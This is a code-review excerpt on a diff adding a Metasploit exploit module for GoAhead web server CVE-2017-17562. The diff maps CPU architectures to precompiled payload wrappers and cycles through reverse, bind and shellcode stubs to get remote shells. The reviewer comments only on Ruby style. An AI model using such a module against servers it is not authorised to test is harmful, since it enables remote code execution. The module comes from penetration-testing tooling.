modules/exploits/linux/http/goahead_ldpreload.rb

```diff
@@ -0,0 +1,391 @@
+
+    register_options(
+      [
+        OptString.new('TARGET_URI', [false, 'The path to a CGI script on the GoAhead server'])
+      ])
+  end
+
+  # Setup our mapping of Metasploit architectures to gcc architectures
+  def setup
+    super
+    @@payload_arch_mappings = {
+        ARCH_X86      => [ 'x86' ],
+        ARCH_X64      => [ 'x86_64' ],
+        ARCH_MIPS     => [ 'mips' ],
+        ARCH_MIPSLE   => [ 'mipsel' ],
+        ARCH_MIPSBE   => [ 'mips' ],
+        ARCH_MIPS64   => [ 'mips64' ],
+        ARCH_MIPS64LE => [ 'mips64el' ],
+
+        # PowerPC stubs are currently over the 16384 maximum POST size
+        # ARCH_PPC      => [ 'powerpc' ],
+        # ARCH_PPC64    => [ 'powerpc64' ],
+        # ARCH_PPC64LE  => [ 'powerpc64le' ],
+
+        ARCH_SPARC    => [ 'sparc' ],
+        ARCH_SPARC64  => [ 'sparc64' ],
+        ARCH_ARMLE    => [ 'armel', 'armhf' ],
+        ARCH_AARCH64  => [ 'aarch64' ],
+        ARCH_ZARCH    => [ 's390x' ],
+    }
+
+    # Architectures we don't offically support but can shell anyways with interact
+    @@payload_arch_bonus = %W{
+      mips64el sparc64 s390x
+    }
+
+    # General platforms (OS + C library)
+    @@payload_platforms = %W{
+      linux-glibc
+    }
+  end
+
+  # Use fancy payload wrappers to make exploitation a joyously lazy exercise
+  def cycle_possible_payloads
+    template_base = ::File.join(Msf::Config.data_directory, "exploits", "CVE-2017-17562")
+    template_list = []
+    template_type = nil
+    template_arch = nil
+
+    # Handle the generic command types first
+    if target.arch.include?(ARCH_CMD)
+
+      # Default to a system() template
+      template_type = 'system'
+
+      # Handle reverse_tcp() templates
+      if target['ReverseStub']
+        template_type = 'reverse'
+      end
+
+      # Handle reverse_tcp() templates
+      if target['BindStub']
+        template_type = 'bind'
+      end
+
+      all_architectures = @@payload_arch_mappings.values.flatten.uniq
+
+      # Prioritize the most common architectures first
+      %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|
+        template_list << all_architectures.delete(t_arch)
+      end
+
+      # Queue up the rest for later
+      all_architectures.each do |t_arch|
+        template_list << t_arch
+      end
+
+    # Handle the specific architecture targets next
+    else
+      template_type = 'shellcode'
+      target.arch.each do |t_name|
+        @@payload_arch_mappings[t_name].each do |t_arch|
+          template_list << t_arch
+        end
+      end
+    end
+
+    # Remove any duplicates that mau have snuck in
+    template_list.uniq!
+
+    # Cycle through each top-level platform we know about
+    @@payload_platforms.each do |t_plat|
+
+      # Cycle through each template and yield
+      template_list.each do |t_arch|
+
+
+        wrapper_path = ::File.join(template_base, "goahead-cgi-#{template_type}-#{t_plat}-#{t_arch}.so.gz")
+        if ! ::File.exists?(wrapper_path)
```

Comment:
`File.exist?` is preferred over `File.exists?` and `unless` is favored over `if !`

```ruby
unless File.exist?(wrapper_path)
```